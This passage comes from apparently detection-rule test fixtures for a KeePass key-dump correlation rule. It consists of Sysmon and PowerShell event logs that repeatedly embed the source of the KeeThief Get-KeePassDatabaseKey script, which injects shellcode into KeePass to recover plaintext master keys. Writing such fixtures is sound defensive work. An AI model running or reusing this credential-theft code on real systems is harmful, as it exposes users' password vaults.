116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "subject.process.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "subject.process.id": "7064", "subject.process.name": "KeeThief.ps1", "subject.process.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc index 8e6c8392..49e9ac61 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc @@ -2,4 +2,5 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"} {"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 